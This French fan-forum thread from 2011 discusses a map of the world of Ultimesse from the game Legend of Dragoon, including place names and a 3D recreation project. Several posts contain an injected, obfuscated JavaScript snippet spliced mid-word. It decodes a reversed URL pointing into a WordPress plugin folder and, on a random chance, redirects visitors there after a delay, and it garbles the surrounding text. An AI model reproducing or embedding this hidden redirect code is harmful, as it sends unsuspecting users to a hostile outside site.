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Carte d'Ultimesse

Posté : 05 mai 2011, 19:18
par Lloyd
Voila ma carte ^^

Carte d'Ultimesse

Elle a subi plusieurs modifications par rapport a la version sur l'ancien forum pour ceux qui s'en souviennent.

Re: Carte d'Ultimesse

Posté : 05 mai 2011, 19:41
par giuliani
Excellente,
en plus ça m'aidera pour mon projet, les cartes dispos sur internet sont assez floues...
Au moins celle-là est super propre et stylée

Par contre, si je peux me permettre il manque Rouge, et Aglis, Ulara

Autre petite suggestion où et comment situerais-tu la rencontre avec le bâteau fantôme, la forêt des voliens et du coup les terres interdites, Zenebatos et Mayfil ?

Re: Carte d'Ultimesse

Posté : 05 mai 2011, 19:47
par Lloyd
Je ne suis pas contre de l'aide pour compléter ma carte si il manque des choses. Je me suis basé sur la carte officiel en anglais en essayant de retraduire les noms comme dans le jeux VF (je n'ai d'ailleurs pas réussi a traduire certains noms du continent à droite)

Pour Rouge, Aglis et Ulara je ne sais plus ou elles se situent >_<

Et pour les autres lieux que tu propose ben... aucune idée XD

Re: Carte d'Ultimesse

Posté : 05 mai 2011, 20:05
par giuliani
Ah merde, pareil de mon côté ^^

Pour Rouge (et Aglis qui surgit des hauts en face de Rouge), en relisant des soluces, il semblerait que ça se situe dans les iles brisées à gauche, mais de mémoire on y accédait depuis Fletz, du coup je trouve que sur la carte c'est qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and même super éloigné et donc pas très cohérent...

Je suis en train de me refaire le jeu mais comme je ne suis qu'au début, je reste dans la prison d'héléna pour étudier l'intérieur et la recréer en 3D. je suis pris d'une petite crise de folie Dragoon en ce moment, et je vais essayer de commencer un petit MMORPG amateur :D

Pour le continent de droite, pas la peine de les traduire je pense, on les voit pas en jeu, moi je lis de haut en bas:
Azeel
Posta
Ezirgse?
Slalio
Seilnder?
Et Nissel

Re: Carte d'Ultimesse

Posté : 07 mai 2011, 18:59
par giuliani
Salut Lloyd,

Pour reconstituer la mappemonde de Dragoon en 3D, je suis en train de me taper toutes les vidéos du jeu.
Si ça te dit, je pourrais à l'aide de la map que tu viens de refaire, par exemple rajouter tout un tas d'annotations et de lieu pour la rendre la plus complète possible.
Après je ne veux pas saborder ton travail (j'insiste là-dessus, le probléme des PM et autres messages sur les forums, c'est l'aspect impersonnel des propos, donc je ne veux pas causer de problème ni qu'il y ait de malentendu entre nous ^^), mais je pourrais te renvoyer un brouillon de ta map modifiée et éventuellement et si tu le souhaites tu pourrais la remodifier avec ton style?

Tiens moi au courant

A bientôt

Re: Carte d'Ultimesse

Posté : 08 mai 2011, 17:35
par Lloyd
Ha mais bien sur, toute aide est la bienvenue ^^

Ces informations pourront d'ailleurs être très utile lors de la rédaction de "l'Atlas d'Ultimesse" pour le site avec des description des lieux, images, emplacement sur la carte etc, je réfléchi pour faire un truc clair et joli.

Re: Carte d'Ultimesse

Posté : 08 mai 2011, 18:23
par yami627
giuliani a écrit :Autre petite suggestion où et comment situerais-tu la rencontre avec le bâteau fantôme, la forêt des voliens et du coup les terres interdites, Zenebatos et Mayfil ?
pourquoi pas mettre ses lieu d'une autre couleurs ou entre parenthèse... histoire de bien les diffenrencier car elles ne sont pas la des le début (enfin je me comprend XD désolée si je ne suis pas assez clair XD)

giuliani a écrit :Pour reconstituer la mappemonde de Dragoon en 3D, je suis en train de me taper toutes les vidéos du jeu.
Les plans que j'ai fait pour la soluce pourrait peut être t'aider ? dis moi si tu veux que je te les envoie. (elles sont plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que sur le forum en réalité)

Re: Carte d'Ultimesse

Posté : 08 mai 2011, 21:55
par giuliani
Nickel Lloyd, j'ai bientôt terminer je t'enverrai ça dès que possible, ou je poste le lien vers le brouillon dans ce topic sinon.
yami627 a écrit : Les plans que j'ai fait pour la soluce pourrait peut être t'aider ? dis moi si tu veux que je te les envoie. (elles sont plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que sur le forum en réalité)
Mais tes plans m'aident déjà beaucoup^^
Si tu les as en plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ça m'intéresse, aussi j'ai vu que derrière un de tes plans tu as mis le croquis de Fruegel (pour la prison) si tu as le croquis, ça m'intéresse aussi, parce que je n'arrive pas à le trouver.
merci d'avance ^^

Re: Carte d'Ultimesse

Posté : 08 mai 2011, 23:34
par giuliani
Voila, j'ai bouclé la carte cette nuit, c'est brouillon hein^^

http://phamter.free.fr/images/Carte_LoD2.png

Tu verras j'ai déplacé certains des lieux de ta carte, je les ai juste décalés, pour les cités dans les airs, les positions sont plus approximatives, même chose pour l'arbre divin.
Les traits de couleurs représentent les trajets pour chacun des chapitres, depuis le rond (point de départ du CD) les pointillés représentent les passages à débloquer le plus souvent, ou cachés, ou à dos de Coolon dans les airs etc...
J’espère que ce sera lisible et compréhensible ^^

Re: Carte d'Ultimesse

Posté : 09 mai 2011, 10:21
par Septine Madrona
Beau boulot! Il m'a fallu un peu de temps pour comprendre les trajets, heureusement qu'il y a la légende.